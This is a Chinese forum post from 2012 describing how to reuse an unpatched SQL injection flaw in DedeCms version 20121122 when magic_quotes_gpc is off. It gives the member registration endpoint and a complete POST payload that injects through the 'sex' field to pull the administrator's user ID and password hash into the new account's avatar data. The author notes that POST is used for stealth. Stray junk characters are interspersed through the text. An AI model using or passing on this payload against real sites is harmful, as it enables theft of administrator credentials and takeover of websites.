找回密码
 立即注册
查看: 2888|回复: 0
打印 上一主题 下一主题

DedeCms SQL注射漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-5 10:03:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
dedecms版本 20121122
; l  @5 s  T5 X" U& v# z% q5 Y% V9 m" [/ p4 S
需要magic_quotes_gpc=Off
! o7 V2 C, q) t* S- r* G. B' E: s/ n" d# s' ^. m9 n2 b/ J
应该是没有什么大危害的漏洞.( Z+ ?' }" d3 \5 H1 A+ \4 b$ d
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.6 l  [( h' _: _* F: @
! l0 q8 s8 d/ A3 y$ R5 a8 u& U, T
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的., |( T' v, W3 l& R
POST提交以下数据,其实不用POST提交的,这样隐蔽点.) g1 `" X) Z" A
! u5 `( q/ v5 d7 _
http:///de/member/reg_new.php* X$ G  p9 t4 A$ O3 o! f( ], z  E
: ]" h* t$ n# }* k/ f& Q$ a
POST
: W& O% V$ h- m7 w6 p$ q; J2 T; Z9 g4 G6 E
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=" c5 B' Z! t9 a: T3 g( Q
1 Q, Y& z7 C& ?6 E
成功注册后,头像处里面有好玩的信息.: q1 h+ v& O4 y( k7 T" v

$ E- h" o8 O* \+ M# r: F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表